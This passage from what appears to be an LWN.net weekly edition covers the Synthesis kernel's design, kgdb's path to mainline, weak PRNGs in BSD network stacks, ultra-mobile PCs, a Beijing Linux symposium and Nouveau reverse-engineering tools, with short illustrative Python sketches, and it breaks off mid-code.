template for the final code, with "holes" where the run-time data will
go.  The run-time code generation then takes advantage of
data-dependent optimizations.  For example, if the code evaluates A *
B, and at run-time we discover that B is always 1, then we can generate
more efficient code that skips the multiplication step and run that
code instead of the original.  Fully optimized versions of the code
pre-computed for common data values can be simply swapped in without
any further run-time computation.  Another example from the thesis:


[...] Suppose that the compiler knows, either through static
control-flow analysis, or simply by the programmer telling it through
some directives, that the function f(p1, ...) = 4 * p1 +
... will be specialized at run-time for constant p1.  The compiler can
deduce that the expression 4 * p1 will reduce to a constant, but it
does not know what particular value that constant will have.  It can
capture this knowledge in a custom code generator for f that
computes the value 4 * p1 when p1 becomes known and stores it in the
correct spot in the machine code of the specialized function
f, bypassing the need for analysis at run-time.


Run-time code generation in Synthesis is a fusion of compile-time and
run-time optimizations in which useful code templates are created at
compile time that can later be optimized simply and cleanly at run
time.
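
As a rough illustration of the "template with holes" idea, here is a
minimal Python sketch.  It is not how Synthesis does it (Synthesis patches
machine code), and every name in it is hypothetical; the second operand
p2 is an assumption standing in for the elided "..." in the thesis
example.  The template is prepared ahead of time, and the value 4 * p1 is
computed once, when p1 becomes known, and written into the hole.

```python
# Hypothetical sketch: Python source text stands in for a machine-code template.
# The "{constant!r}" hole is filled in once the run-time value of p1 is known.
TEMPLATE = "def f_specialized(p2):\n    return {constant!r} + p2\n"


def f_generic(p1, p2):
    """Unspecialized version: multiplies on every call."""
    return 4 * p1 + p2


def make_specialized_f(p1):
    """Generate a version of f for one fixed p1.

    The multiplication happens here, once; the generated function only adds.
    """
    constant = 4 * p1
    namespace = {}
    exec(TEMPLATE.format(constant=constant), namespace)
    return namespace["f_specialized"]


f_for_10 = make_specialized_f(10)
print(f_for_10(2), f_generic(10, 2))
```

The specialized function gives the same answer as the generic one for the
p1 it was built for; it simply does less work per call.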

Quajects

Understanding run-time code generation is a prerequisite for
understanding quajects, the basic unit out of which the Synthesis
kernel is constructed.  Quajects are almost but not quite entirely
unlike objects.  Like objects, quajects come in types - queue quaject,
thread quaject, buffer quaject - and encapsulate all the data
associated with the quaject.  Unlike objects, which contain pointers
to functions implementing their methods, quajects contain the code
implementing their methods directly.  That's right - the actual
executable instructions are stored inside the data structure of the
quaject, with the code nestled up against the data it will operate on.
In cases where the code is too large to fit in the quaject, the code
jumps out to the rest of the method located elsewhere in memory.  The
code implementing the methods is created by filling in pre-compiled
templates and can be self-modifying as well.


Quajects interact with other quajects via a direct and simple system
of cross-quaject calls: callentries, callouts, and callbacks.  The
user of a quaject invokes callentries in the quaject, which implement
that quaject's methods.  Usually the callentry returns back to the
caller as normal, but in exceptional situations the quaject will
invoke a method in the caller's quaject - a callback.  Callouts are
places where a quaject invokes some other quaject's callentries.


Synthesis implements a basic set of quajects - thread, queue, buffer,
clock, etc. - and builds higher-level structures by combining
lower-level quajects.  For example, a UNIX process is constructed out
of a thread quaject, a memory quaject, and some I/O quajects.


As an example, let's look at the queue quaject's interface.  A queue
has two callentries, queue_put and queue_get.  These
are invoked by another quaject wanting to add or remove entries to and
from the queue.  The queue quaject also has four callbacks into the
caller's quaject, queue_full, queue_full-1,
queue_empty, and queue_empty-1.  When a caller
invokes the queue_put method and the queue is full, the queue
quaject invokes the queue_full callback in the caller's
quaject.  From the thesis:


The idea is: instead of returning a condition code for interpretation
by the invoker, the queue quaject directly calls the appropriate
handling routines supplied by the invoker, speeding execution by
eliminating the interpretation of return status codes.  


The queue_full-1 method is executed when a queue has
transitioned from full to not full, queue_empty when the queue doesn't
contain anything, and queue_empty-1 when the queue
transitions from empty to not empty.  With these six callentries and
callbacks, a queue is implemented in a generic, extensible, yet
incredibly efficient manner.
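
The interface described above can be sketched in Python roughly as
follows.  This is only a model of the calling convention, under the
assumption that the callbacks are plain callables supplied by the caller;
the class name and the names on_full_1 and on_empty_1 (for queue_full-1
and queue_empty-1) are hypothetical, and real quajects hold generated
machine code rather than Python objects.

```python
from collections import deque


class QueueQuaject:
    """Model of a queue with two callentries and four caller-supplied callbacks."""

    def __init__(self, capacity, on_full, on_full_1, on_empty, on_empty_1):
        self._items = deque()
        self._capacity = capacity
        self._on_full = on_full        # put attempted on a full queue
        self._on_full_1 = on_full_1    # queue went from full to not full
        self._on_empty = on_empty      # get attempted on an empty queue
        self._on_empty_1 = on_empty_1  # queue went from empty to not empty

    def queue_put(self, item):
        if len(self._items) == self._capacity:
            # No status code is returned; the caller's handler runs directly.
            self._on_full(item)
            return
        was_empty = not self._items
        self._items.append(item)
        if was_empty:
            self._on_empty_1()

    def queue_get(self):
        if not self._items:
            return self._on_empty()
        was_full = len(self._items) == self._capacity
        item = self._items.popleft()
        if was_full:
            self._on_full_1()
        return item
```

Note that neither callentry returns an error code: the exceptional cases
are handled entirely by the caller's own routines.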


Pretty cool stuff, huh?  But wait, there's more!

Optimistic lock-free synchronization

Most modern operating systems use a combination of interrupt disabling
and locks to synchronize access to shared data structures and
guarantee single-threaded execution of critical sections in general.
The most popular synchronization primitive in Linux is the spinlock,
implemented with the nearly universal test-and-set-bit atomic
operation.  When one thread attempts to acquire the spinlock guarding
some critical section, it busy-waits, repeatedly trying to acquire the
spinlock until it succeeds.


Synchronization based on locks works well enough but it has several
problems: contention, deadlock, and priority inversion.  Each of these
problems can be (and is) worked around by following strict rules: keep
the critical section short, always acquire locks in the same order,
and implement various more-or-less complex methods of priority
inheritance.  Defining, implementing, and following these rules is
non-trivial and a source of a lot of the pain involved in writing code
for modern operating systems.


To address these problems, Maurice Herlihy proposed a system of
lock-free synchronization using an atomic compare-and-swap
instruction.  Compare-and-swap takes the address of a word, the
previous value of the word, and the desired new value of the word.  It
stores the new value into the word if and only if the word's current
value is still the same as the previous value.  The bare
compare-and-swap instruction allows atomic updates of single pointers.
To atomically switch between larger data structures, a new copy of the
data structure is created, updated with the changes, and the addresses
of the two data structures swapped.  If the compare-and-swap fails
because some other thread has updated the value, the operation is
retried until it succeeds.
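
The copy, update, and swap cycle can be sketched in Python as shown here.
Python exposes no compare-and-swap instruction, so this sketch assumes a
small AtomicRef class (hypothetical) in which an internal lock stands in
for the atomicity the hardware would provide; only the retry loop in
append_item is the point of the example.

```python
import threading


class AtomicRef:
    """A shared reference with a simulated compare-and-swap.

    The internal lock only models the atomicity of a hardware instruction;
    callers never hold it across their own work.
    """

    def __init__(self, value):
        self._value = value
        self._atomic = threading.Lock()

    def load(self):
        return self._value

    def compare_and_swap(self, expected, new):
        """Store `new` only if the current value is still `expected`."""
        with self._atomic:
            if self._value is expected:
                self._value = new
                return True
            return False


def append_item(ref, item):
    """Copy the structure, change the copy, then try to swap it in."""
    while True:
        old = ref.load()
        new = old + (item,)  # a fresh tuple; the old one is never modified
        if ref.compare_and_swap(old, new):
            return
        # Another thread got there first: retry against the newer value.


def run_demo(threads=4, per_thread=250):
    """Have several threads append concurrently and return the final tuple."""
    shared = AtomicRef(())

    def worker(base):
        for i in range(per_thread):
            append_item(shared, base + i)

    pool = [threading.Thread(target=worker, args=(t * per_thread,))
            for t in range(threads)]
    for t in pool:
        t.start()
    for t in pool:
        t.join()
    return shared.load()
```

Every append copies the whole tuple, which is exactly the copying cost
that makes this style expensive for larger structures.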


Lock-free synchronization eliminates deadlocks, the need for strict
lock ordering rules, and priority inversion (contention on the
compare-and-swap instruction itself is still a concern, but rarely
observed in the wild).  The main drawback of Herlihy's algorithms is
that they require a lot of data copying for anything more complex than
swapping two addresses, making the total cost of the operation greater
than the cost of locking algorithms in many cases.  Massalin took
advantage of the two-word compare-and-swap instruction available in
the Motorola 68030 and expanded on Herlihy's work to implement
lock-free and copy-free synchronization of queues, stacks, and linked
lists.  She then took a novel approach: rather than choosing a general
synchronization technique (like spinlocks) and applying it to arbitrary
data structures and operations, she built the operating system out
of data structures simple enough to be updated in an efficient
lock-free manner.


Synthesis is actually even cooler than lock-free: Given the system of
quajects, code synthesis, and callbacks, operations on data structures
can be completely synchronization-free in common situations.  For
example, a single-producer, single-consumer queue can be updated
concurrently without any kind of synchronization as long as the queue
is non-empty, since each thread operates on only one end of the queue.
When the callback for queue empty happens, the code to operate on the
queue is switched to use the lock-free synchronization code.  When the
quaject's queue-not-empty callback is invoked, the quajects switch
back to the synchronization-free code. (This specific algorithm is
not, to my knowledge, described in detail in the thesis, but was
imparted to me some months ago by Dr. Massalin herself at one of those
wild late-night kernel programmer parties, so take my description with
a grain of salt.)
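
The observation that each thread touches only one end of the queue is the
basis of the textbook single-producer, single-consumer ring buffer,
sketched below in Python.  This is not the Synthesis algorithm (there is
no code switching on empty), and the class and method names are
hypothetical; it only shows why the two sides need not contend, since the
producer is the only writer of the tail index and the consumer the only
writer of the head index.  A real implementation in C or assembly would
also need to consider memory ordering, which this sketch ignores.

```python
class SpscRing:
    """Single-producer, single-consumer ring buffer (illustrative only)."""

    def __init__(self, capacity):
        # One slot stays unused so that head == tail always means "empty".
        self._slots = [None] * (capacity + 1)
        self._head = 0  # advanced only by the consumer
        self._tail = 0  # advanced only by the producer

    def put(self, item):
        """Producer side.  Returns False if the ring is full."""
        nxt = (self._tail + 1) % len(self._slots)
        if nxt == self._head:
            return False
        self._slots[self._tail] = item
        self._tail = nxt  # publish only after the slot has been filled
        return True

    def get(self):
        """Consumer side.  Returns (True, item), or (False, None) if empty."""
        if self._head == self._tail:
            return (False, None)
        item = self._slots[self._head]
        self._head = (self._head + 1) % len(self._slots)
        return (True, item)
```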


The approach to synchronization in Synthesis is summarized in the
following quote:


 Avoid synchronization whenever possible.
 Encode shared data into one or two machine words.
 Express the operation in terms of one or more fast lock-free data
structure operations.
 Partition the work into two parts: a part that can be done
lock-free, and a part that can be postponed to a time when there can
be no interference.
 Use a server thread to serialize the operation.  Communications
with the server happens using concurrent, lock-free queues.


The last two points will sound familiar if you're aware of Paul McKenney's
read-copy-update (RCU) algorithm.  In Synthesis, thread structures
to be deleted or removed from the run queue are marked as such, and
then actually deleted or removed by the scheduler thread during normal
traversal of the run queue.  In RCU, the reference to a list entry is
removed from the linked list while holding the list lock, but the
removed list entry is not actually freed until it can be guaranteed
that no reader is accessing that entry.  In both cases, reads are
synchronization-free, but deletes are separated into two phases, one
that begins the operation in an efficient low-contention manner, and a
second, deferred, synchronization-free phase to complete the
operation.  The two techniques are by no means the same, but share a
similar philosophy.
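
A toy model of the two-phase removal described for Synthesis might look
like the following Python sketch.  The class and method names are
hypothetical, and the sketch assumes that setting a flag is cheap and safe
from any thread while only the scheduler ever restructures the run queue.

```python
class ThreadEntry:
    def __init__(self, name):
        self.name = name
        self.marked_for_removal = False


class RunQueue:
    def __init__(self, names):
        self.entries = [ThreadEntry(name) for name in names]

    def request_removal(self, name):
        """Phase one: just mark the entry; the queue itself is untouched."""
        for entry in self.entries:
            if entry.name == name:
                entry.marked_for_removal = True

    def scheduler_pass(self):
        """Phase two: during its normal traversal, the scheduler drops
        marked entries and returns the names of the threads it ran."""
        ran = []
        survivors = []
        for entry in self.entries:
            if entry.marked_for_removal:
                continue  # the deferred removal happens here
            ran.append(entry.name)
            survivors.append(entry)
        self.entries = survivors
        return ran
```

After request_removal() the entry is still present in the queue; it
disappears only on the scheduler's next pass.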

Synthesis: Operating system of the future?

The design principles of Synthesis, while powerful and generic, still
have some major drawbacks.  The algorithms are difficult to understand
and implement for regular human beings (or kernel programmers, for
that matter).  As Linux has demonstrated, making kernel development
simple enough that a wide variety of people can contribute has some
significant payoffs.  Another drawback is that two-word
compare-and-swap is, shall we say, not a common feature of modern
processors.  Lock-free synchronization can be achieved without this
instruction, but it is far less efficient.  In my opinion, reading
this paper is valuable more for retraining the way your brain thinks
about synchronization than for copying the exact algorithms.  This
thesis is especially valuable reading for people interested in
low-latency or real-time response, since one of the explicit goals of
Synthesis is support for real-time sound processing.


Finally, I want to note that Synthesis contains many more elegant
ideas that I couldn't cover in even the most superficial detail -
quaject-based user/kernel interface, per-process exception tables,
scheduling based on I/O rates, etc., etc.  And while the exact
implementation details are fascinating, the thesis is also peppered
with delightful koan-like statements about design patterns for
operating systems.  Any time you're feeling bored with operating
systems, sit down and read a chapter of this thesis.


[ Valerie Henson is a Linux file
systems consultant and proud recipient of a piggy-back ride from
Dr. Alexia Massalin. ]


		kgdb getting closer to being merged?


The kernel source level debugger, kgdb, has been around for a long time, but
never in the mainline tree.  Linus Torvalds is not much of a fan of
debuggers in general and has always resisted the inclusion of kgdb.  That
looks like it might be changing somewhat, with the inclusion of kgdb in
2.6.26 now a distinct possibility.


Over the years, Torvalds has made various pronouncements about debuggers,
particularly kernel debuggers; a long message to
linux-kernel in 2000 seems to outline his objections:

I happen to believe that not having a kernel debugger forces people to
think about their problem on a different level than with a debugger. I
think that without a debugger, you don't get into that mindset where you
know how it behaves, and then you fix it from there. Without a debugger,
you tend to think about problems another way. You want to understand
things on a different _level_.

 An attempt to sneak kgdb into the mainline via x86 architecture updates
failed, but Torvalds did open the
door a crack towards merging the kgdb changes: "I won't even
consider pulling it unless it's offered as a separate tree, not mixed up
with other things. At that point I can give a look."  That has
spawned the kgdb-light effort, spearheaded by Ingo Molnar.

The original hope of getting it
included in 2.6.25 has been dashed, but with Molnar rapidly iterating
to address kernel hacker concerns, the number of complaints seems to be
decreasing.  Molnar is up to version 10 of the
kgdb-light patchset in something like three days since the first was
posted.  The various linux-kernel threads show a number of very
hopeful developers waiting with bated breath to see if kgdb can finally
make its way into the mainline.


The light version of kgdb still has most of the capabilities of the
original kgdb and any additional, possibly more intrusive, features can be
added later.  Molnar is clearly trying to do things the right way, with a
merge of the non-intrusive kgdb functionality that can eventually be used by multiple
architectures.  He points out that there are already gdb remote stubs in
three separate architectures in the mainline, continuing:

So we could have done it the same way, by doing cp kernel/kgdb.c 
arch/x86/kernel/gdb-stub.c and merging that. Nobody could have said a 
_single_ word - we already have lowlevel UART code in early_printk.c 
that we could have reused.

But we wanted to do it _right_ and not add an arch/x86/kernel/gdb-stub.c 
special hack.


Discussions about the patches have been mostly to point out problems or
areas that need cleaning up.  The philosophical objections have been mostly
avoided, quite possibly because Molnar has been scrupulously trying to make
a "no impact" set of patches:

this kgdb series has _obviously_ zero impact on the kernel, 
because it just does not touch any dangerous codepath. From this point 
on KGDB can evolve in small, well-controlled baby steps, as all other 
kernel code as well.


To that end, the patch changes 22 files (rather than the 41 touched by the
original kgdb submission), removing "_all_ critical path
impact" and the low-level serial drivers—as Molnar points out,
kgdb should not be in the driver business.  In addition, the "kgdb over
polled consoles" support has been reworked and cleaned up.  Various hacks
to get at module symbols have been removed as a better solution for
that problem is needed.  So far, no show-stopping problems have been
identified, so it really seems to come down to what Torvalds thinks; for that,
we may have to wait until the 2.6.26 merge window opens in April or May.


		The dangers of weak random numbers


Amit Klein has been looking into pseudo-random number generators (PRNGs) again. He
has found a number of problems in the algorithms that make it easier to
guess the next number generated.  Much like his earlier work on Berkeley
Internet Name Daemon (BIND), Klein found that with a small amount of
traffic, predicting the next DNS transaction ID or IP fragmentation ID is
possible.  Anything that uses random numbers for security purposes (as
opposed to, say, choosing which fortune to
deliver) needs to ensure that its random numbers are
cryptographically strong.


In his report,
Klein looks at a specific algorithm that has been implemented, with slight
variations, in multiple places.  It was introduced into OpenBSD in 1997 to
randomize two 16-bit IDs to protect against predictability.  Prior
to that, both DNS transaction IDs and IP fragmentation IDs were essentially
just incrementing counters.  Various attacks, like idle scanning and DNS cache
poisoning, were possible because those IDs could be predicted.
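
To see why an incrementing counter is so easy to attack, consider this
small Python sketch.  The class and function names are hypothetical, and
the random alternative shown uses Python's secrets module purely for
contrast; it is not the OpenBSD or BIND algorithm.

```python
import secrets


class SequentialIdSource:
    """16-bit ID generator that simply counts, as in the pre-1997 behavior."""

    def __init__(self, start=0):
        self._next = start & 0xFFFF

    def next_id(self):
        value = self._next
        self._next = (self._next + 1) & 0xFFFF  # wrap at 16 bits
        return value


def predict_next(observed_id):
    """An attacker who has seen one ID knows the next one."""
    return (observed_id + 1) & 0xFFFF


def random_id():
    """A 16-bit ID drawn from a cryptographically strong source."""
    return secrets.randbelow(1 << 16)


source = SequentialIdSource(start=0x1234)
seen = source.next_id()
print(predict_next(seen) == source.next_id())
```

Even a strong generator leaves only 65,536 possible values in a 16-bit
field, so randomization raises the cost of guessing rather than
eliminating it.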

 The OpenBSD PRNG algorithm was then used in their BIND 9
implementation, replacing the solution that Internet Systems Consortium
(ISC)—maintainer of BIND—had used.  ISC added a random number
for the 16-bit DNS transaction ID, instead of an incrementing counter, as
part of BIND 9.  Klein's earlier work found problems with that
PRNG—avoided by the OpenBSD version—leading to a certain
amount of smugness
on the part of the OpenBSD folks.  

It is clear that the OpenBSD algorithm is better than the one ISC
introduced in BIND 9, but Klein was still able to find ways to break it.
The method requires much more computation than was needed to crack BIND 9
transaction IDs, roughly six minutes of computation on a fairly high-end
processor.  Klein presents various ideas to parallelize the algorithm for
multi-core or multi-processor computation that could bring that number way
down.  So, there is no working exploit available, but one is well
within reach; a determined attacker could make use of the techniques to
poison the cache of OpenBSD servers.


In addition, Klein found ways to exploit the IP fragmentation ID
predictability to do idle scanning, host operating system fingerprinting,
and other kinds of information leaks; it may also be possible to inject an
attacker-controlled packet into a TCP/IP connection, called a blind data
injection.  The belief in the strength of the OpenBSD PRNG made it an attractive
option for others in the BSD family to adopt.  NetBSD, FreeBSD, and
DragonFly BSD all adopted a variant of the algorithm for the IP
fragmentation ID, as did the FreeBSD-derived Mac OS X.


It should be noted that only OpenBSD and Mac OS X enable the fragmentation
ID randomization by default; the others have a setting for it, but their
default behavior is sequential IDs (i.e. id++), which is clearly even easier
to predict.  The security team for each of the OSes had a fairly
predictable response, with one notable exception.  NetBSD, FreeBSD, and DragonFly
BSD all changed the PRNG algorithm for less predictability; Apple claimed
to be working on the problem but could not provide a timeline for a fix.


The exceptional response came from OpenBSD, who are "completely
uninterested in the problem," according to an email from the OpenBSD
coordinator (presumably Theo de Raadt) that Klein quotes.  The email goes
on to say that the problem is "completely irrelevant in the real world."
This kind of bluster is surprising from the OS that prides itself on
security; it was, after all, the first to introduce randomization of these
IDs.  It may be that exploiting the predictability is hard to do, but
Klein's techniques clearly reduce the search space drastically, which is not
what you want from a PRNG.  The other BSDs found it important enough to
change; what does OpenBSD know that they don't?

 It would be foolish for Linux users to write this off as a "BSD
problem"—though the random numbers used for IP fragmentation IDs by
Linux are considered to be cryptographically strong—because there
very well may be problems elsewhere in Linux or the applications that are
typically run on it.  We are not immune to making mistakes, so all uses of
random numbers should be scrutinized.  New development needs to remember
these lessons of the past as well, so that we can avoid this kind of
problem in the future.

		Directions in UMPC-land


It is an exciting time for Linux users who are interested in ultra-mobile
PCs (UMPCs).  New models are being announced frequently with
many—dare we say most?—coming with at least the option to have
Linux pre-installed.  The low-cost models probably require Linux in order
to make their price point, but even higher-end UMPCs seem to be made with
Linux firmly in mind.  In many ways, the One
Laptop Per Child (OLPC) project has driven the demand for low-cost
machines for adults as well. 


Commercial offerings from ASUS (Eee PC), Everex (Cloudbook), Elonex (One),
along with a rumored
UMPC from HP are giving both the OLPC and Intel's ClassmatePC some
competition.  Add in Nokia's N810 and you have a half-dozen very mobile
solutions featuring Linux—though the ClassmatePC seems to be more
geared towards Windows XP.  None of them has quite the right set of
features to be the ultimate UMPC, but we seem to be headed in the right
direction, so it is worth contemplating what that machine might look like.

 Battery life is the Achilles' heel of mobile devices; some kind of
breakthrough in power consumption or energy storage needs to happen for big
strides to be made in this area.  Because of weight considerations, today's
UMPCs tend to have small batteries and three hours or less of battery life.
Something on the order of twelve hours—with a measurement in days
being the real goal—is more like what is needed.  Perhaps some kind
of human-powered or alternative charging mechanism can play a role.  It is
probably the biggest challenge to reaching something approaching an
ultimate device.  

Part of the reason that battery life is so short is the amount of power
the display consumes.  With rotating media on its way out (at least for
these kinds of devices), the display is one of the areas where power
savings would be felt most strongly.  The E-Ink displays, such as those
used by the newer e-book readers, have some great properties in terms of
power consumption, but the speed at which they update makes them
undesirable for general computer use.  Many of us spend a fair amount of time
looking at a static screen for several to many seconds at a time.  Web
pages or e-books might be candidates for using E-Ink, perhaps, but not
Wesnoth or typing a document.


Perhaps a dual-mode screen that
combined an LED and E-Ink display could blend the best of both.  OLPC has
an innovative display with many of the characteristics needed, which can also
be viewed in sunlit conditions.  Former OLPC CTO Mary Lou
Jepsen's startup is licensing the XO display technology, so we may see it in a
UMPC before too long. 


The size of the display will likely need to be larger than today's
offerings as well.  That will be a balancing act between size, weight, and cost
which will be interesting to see play out.  A touchscreen is another feature
that will be necessary as the display should be usable separate
from the keyboard.  Some way of transforming a small laptop into a tablet
PC and e-book reader would be very desirable, with bonus points awarded if that
transformation is fast and seamless.


A full-sized, or nearly so, keyboard is also a necessity.  Too much of the
work that we do involves words and numbers that need to be input.  If this
device is to become an integral part of a day-to-day routine, thumb
or child-sized keyboards just won't cut it.


Wifi and wired connectivity are obvious, while Bluetooth would seem to be a
good addition to provide internet via cell phone.  Some might want to
integrate actual cell phone functionality into the device itself—to avoid
the multiple device hassle.  Given that the size of a UMPC won't ever reach
that of a cell phone, that seems like a stretch, but for those who want it,
an optional feature seems like the way to provide that.


Like the OLPC, the device should be ruggedized, able to withstand
reasonable amounts of abuse without much more than a case scratch.  This is
another area where flash disks will help as there won't be the threat of
losing data when the disk heads suffer rapid deceleration.   The price per
gigabyte for solid-state drives will drop to the point where a few hundred
GB will be possible at a reasonable price.  Carrying around one's favorite
music as FLACs, rather than in some lossy format, should be possible.

A fairly modest and power-friendly processor with a GB or two of RAM should round out the
basics of the hardware.  The device will run Linux, of course, and might
have a few other peripherals: camera, microphone, speakers, etc.   All
should be available for $500-700, at least in a very functional low-end
configuration.  When might we see such a device?  Two to three years seems
quite likely, certainly before five years have passed.  When it's ready,
please send one to LWN for review in care of the author.


		A Beijing trip report


China would seem like an ideal environment for free software.  The Chinese
have a need for vast amounts of software as their country rapidly
industrializes, they have reasons to prefer software which is not controlled by
American corporations, and they have been coming under some pressure from
those same corporations to do something about their little habit of copying
proprietary software without much regard for details like license
agreements.  Free software offers them the ability to take control of their
own software, make sure it lacks unwelcome surprises, and copy it as much
as they like.  And China has been making a lot of use of Linux and free
software, but, as is the case with many Asian countries, China's presence in the
development community is relatively small.


Encouraging participation from Asian countries has been a goal of the Linux
Foundation for some time; one result of that is the series of symposiums
held in Japan over the last few years.  Now, for the first time, the
Foundation has extended this series to China.  On February 19
and 20, the first Linux Developer Symposium China was held in
Beijing.  This event was organized in cooperation with the China Open Source Promotion Union
(COPU).  Your editor had the privilege of speaking at this meeting. 


This was not the kind of developer-oriented gathering that one might expect
to find in many other parts of the world.  Far too many suits and ties, for
example.  Often the focus of the event appeared to be the creation of photo
opportunities while people (who were not developers) gave speeches.  In
general, it was organized in a mode of talking to the participants,
rather than talking with them.  The agenda
makes this clear: 17 speakers on the first day, with only one break (for
lunch).  The talks were well received by a sellout crowd, but there was not
a lot of opportunity for people to talk.


The second day featured a round table discussion and a set of BOF
sessions.  The round table was interesting, though it focused on issues
which are not necessarily development oriented: Linux adoption in mobile
devices, competing with pirated copies of Windows, etc.  The BOF was, in
many ways, the most interesting part of the whole event; this was where
participants could find people with similar interests and simply ask
questions.  Your editor fielded questions on security modules, the kevent
interface, community participation in Asia, language issues, and more.
Chinese developers, like their Japanese counterparts, seem to be reluctant
to ask questions in front of a large group.  But, in a closer situation,
the floodgates open and all kinds of questions come out.


Unfortunately, the second day was open only to a small subset of the
conference attendees, and that subset was heavy on the managerial side.  So
a lot of people who could have benefited most from the BOF session were
not there.


One topic which never came up - until your editor raised it briefly at the
round table session - was license compliance.  For the most part, it does
not seem to be on the radar there.  Your editor was told that GPL
violations are common with products which are sold in the Chinese market
but not exported elsewhere; the
people involved can assume, with seemingly good reason, that nobody will
take them to court.  There is also a fair amount of driver work being done
for companies in other countries; once the code is shipped the original
developers forget about it and move on to the next project.  Quite a bit of
that code never makes it into the mainline.


This sort of activity fails to give back to the community which provided
Linux in the first place.  But it also hurts the developers involved.  They
do not become part of the community, do not get recognition for their work,
and miss the opportunity to learn from others.  During the press conference
on the first day, it was noted that Chinese companies are having a hard
time hiring Linux developers, and that more training opportunities would be
a good thing.  Your editor felt the need to point out that, of all the
people working in free software projects, very few of them are specifically
trained to do so.  It's more a matter of individual initiative.  Training
is good, but the training received in Chinese universities should be more
than adequate for those looking to get involved with free software.


Andrew Morton took that theme further by pointing out that, rather than
complaining about difficulties in hiring, these companies
would be better off encouraging community participation and skills
development within their existing staff.  That would be more productive
than chasing the same small set of
developers that everybody else is trying to hire.  On the second day, Dave
Neary made the crucial point that community participation is something that
individuals - not companies - do.  There are a lot of companies worldwide
which have a hard time understanding how free software development works,
and China is no exception.


One last note on hiring free software hackers.  Your editor ran across this
article, which states:


	In China, 43 per cent of IT graduates are unemployed, and hacker
	"training" web sites are creating a pool of effective malware
	authors and paying them like a legitimate business. 


In such a situation (assuming the claim is true - something your editor
cannot vouch for), finding developers who
are able and willing to learn how to hack on free software should not be
that hard.


Meanwhile, your editor was struck by the energy and initiative shown by the
Beijing Linux Users
Group, which helped with many aspects of the event.  BLUG is busily
organizing gatherings and creating a local community out of Beijing's
hackers.  A real spark is glowing there; it will be interesting to see how
that group develops in the near future.  


All told, the event was a clear success.  It was a proper media event which
raised the profile of Linux in China and showed that Linux developers care
enough about the country to pay a visit.  A mixture of local and imported
developers were able to present their work to an attentive and interested
audience.  The discussions brought developers closer and, hopefully, sent
them away with interesting things on their "to do" lists.  And,
importantly, the visiting developers learned something about China that
goes beyond the proper technique for eating Peking Duck or the effort
required to climb the Great Wall (or to circumvent the rather obnoxious great
firewall).  With luck, we have a better understanding of what developers
are up to in that part of the world and how we can help them to participate
fully in our projects.  And that can only be a good thing.


(Some
pictures from the event have been posted.  Unbelievable numbers of
photos were taken, so more can be expected to surface at some point.  But,
under no circumstances should anyone look at the scurrilous photo posted by
Andrew Morton.)

		The state of Nouveau, part 2


[Editor's note: this is the second in a two-part series on the state of
the Nouveau driver for NVIDIA hardware.  The first installment is recommended
reading for those who have not yet seen it.]

Sources of information, and reverse engineering tools

As very little information is available on NVidia's hardware design and
implementation, the Nouveau project has developed a number of tools to gain
a better understanding of card architecture and programming model.  These
tools, along with some previously available information, are what are used
to create the driver.

The Haiku/BeOS projects have a driver that came from a software development
kit NVidia released
for NV03/04 cards, and also gathered some information from an unobfuscated
nv driver that appeared briefly in XFree86. This driver has improved
mode-setting code compared to nv, and a basic 3D driver using hard-coded
objects running in a single context.

More information was available in the nvclock utility, which allows
overclocking NVidia GPUs on Linux. Its lead developer Roderick Colenbrander
(Thunderbird) has helped out Nouveau in the clock setup, i2c and tv-out
areas.

renouveau

The first utility developed was called renouveau. renouveau is mainly
concerned with reverse engineering the NVidia binary driver by black-boxing
it, feeding it certain inputs and watching what it writes to the
hardware. It runs a large batch of OpenGL tests which exercise most of the
GPU's capabilities and generates a set of dump files which are sent to the
Nouveau developers.

The tool works by mapping the card registers and the FIFO assigned to the
current application.  It then records the current state of both FIFO and
registers, executes small OpenGL tests, and compares the final state
against the initial saved state.  It then dumps this info, which can be
parsed into a human readable form using an XML register/command
database.  (Some developers would argue the hex is readable to them.)
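
The snapshot-and-compare step can be sketched in a few lines of Python.  This
is only an illustration of the idea, not renouveau's code: the register
addresses are made up, and a plain dictionary of names stands in for the XML
register/command database.

```python
def diff_state(before, after):
    """Return {register: (old, new)} for every register whose value changed.

    'before' and 'after' are snapshots mapping register address -> value.
    A register missing from one snapshot is reported with None on that side.
    """
    changed = {}
    for reg in sorted(set(before) | set(after)):
        old = before.get(reg)
        new = after.get(reg)
        if old != new:
            changed[reg] = (old, new)
    return changed


def format_diff(changed, names=None):
    """Render a diff as text, using a (hypothetical) name database."""
    names = names or {}
    lines = []
    for reg, (old, new) in changed.items():
        label = names.get(reg, "UNKNOWN")
        old_s = "--------" if old is None else f"{old:08x}"
        new_s = "--------" if new is None else f"{new:08x}"
        lines.append(f"{reg:#08x} {label}: {old_s} -> {new_s}")
    return lines


if __name__ == "__main__":
    # Made-up snapshots taken before and after a small test.
    before = {0x100: 0x0, 0x104: 0x5}
    after = {0x100: 0x1, 0x104: 0x5, 0x108: 0x7}
    for line in format_diff(diff_state(before, after),
                            {0x100: "HYPOTHETICAL_CTRL"}):
        print(line)
```

Only the registers that the test actually touched survive the comparison,
which is what makes the resulting dumps small enough to study.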

The tool has advantages in that it can be run very simply by end users, on
various card architectures, without requiring root privileges. It doesn't
tamper with the binary driver, and does not require much technical
knowledge.

MMioTrace

MMioTrace is a tool for tracing memory-mapped I/O (MMIO) access within the kernel. The NVidia
driver contains a kernel module which is responsible for a lot of card
initialization and mode setting. This activity cannot easily be traced by user-space
tools such as renouveau. MMioTrace uses relayfs and debugfs to relay the
tracing data to userspace.

MMioTrace works by replacing the probed driver's calls to the kernel's
ioremap(), ioremap_nocache(), and iounmap() functions with wrappers that
call into MMioTrace. When the driver module in question calls ioremap() to
access the MMIO registers, the pages are mapped as not-present in the kernel
address space instead. It can be set up to trace only the address ranges
which are likely to be touched by the driver you are interested in, thus
reducing the number of irrelevant MMIO accesses recorded.
 
When the module then tries to access the register space, a page fault will
occur.  In the page fault handler the address is detected and the attempted
action recorded.  The page is then marked present and the page-faulting
code is single-stepped to execute the instruction doing MMIO. After that
the page is set to "not present" again so that the cycle can be restarted
for the next access to the page.
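
The cycle described above can be modeled in user space.  The Python sketch
below is a toy simulation, not kernel code and not MMioTrace's
implementation: the class TracedPage and its methods are invented here, a
dictionary stands in for the device registers, and "single-stepping" is
reduced to performing the one access.

```python
class TracedPage:
    """Toy model of one MMIO page under fault-based tracing (hypothetical)."""

    def __init__(self, base, size=4096):
        self.base = base
        self.size = size
        self.present = False   # armed: any access "faults"
        self.registers = {}    # offset -> value; stands in for the device
        self.log = []          # recorded (op, address, value) tuples

    def _access(self, op, addr, value=None):
        if not self.base <= addr < self.base + self.size:
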